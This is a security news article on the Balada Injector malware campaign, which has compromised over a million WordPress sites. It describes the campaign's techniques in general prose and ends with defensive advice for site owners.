Balada Injector

According to security researchers, an ongoing attack campaign delivering malware tracked as the Balada Injector has managed to infect over one million WordPress websites. It is believed that the malicious operation has been active since at least 2017. The cybercriminals use a wide range of different techniques to exploit known and newly discovered vulnerabilities in WordPress themes and plugins, allowing them to gain access to the targeted websites.

The report detailing the Balada Injector, released by the security company Sucuri, states that new attack waves take place every couple of weeks. There are several signature signs of this particular malicious activity, including the use of String.fromCharCode obfuscation, the deployment of bad scripts on newly registered domain names, and redirects to various scam sites. The infected websites are used for a variety of fraudulent purposes, including fake tech support, lottery frauds, and rogue CAPTCHA pages that urge users to turn on notifications to verify that they are not robots, thus enabling the attackers to send spam ads.

The Balada Injector Exploits Numerous Security Weaknesses

During the time it has been deployed, the Balada Injector threat has resorted to utilizing more than 100 domains and various methods to exploit well-known security weaknesses, such as HTML injection and Site URL. The attackers' primary goal has been to gain access to the database credentials stored in the wp-config.php file.

Furthermore, the attacks are designed to access and download important site files such as backups, database dumps, log files, and error files. They also search for any leftover tools like adminer and phpmyadmin that site administrators may have left behind after performing maintenance tasks. This provides the attackers with a wider range of options to compromise the website and steal sensitive data.

The Balada Injector Provides Backdoor Access to the Cybercriminals

The Balada Injector malware has the ability to generate fraudulent WordPress admin users, collect data stored in the underlying hosts, and leave backdoors that provide persistent access to the system.

Moreover, Balada Injector performs extensive searches in the top-level directories of the compromised website's file system to identify writable directories belonging to other sites. Typically, these sites are owned by the same webmaster and share the same server account and file permissions. Thus, compromising one site can potentially provide access to multiple other sites, further expanding the attack.

If these methods fail, the admin password is forcefully guessed via a set of 74 predetermined credentials. To prevent these types of attacks, WordPress users are strongly encouraged to keep their website software updated, remove any unused plugins and themes, and use strong passwords for their WordPress admin accounts.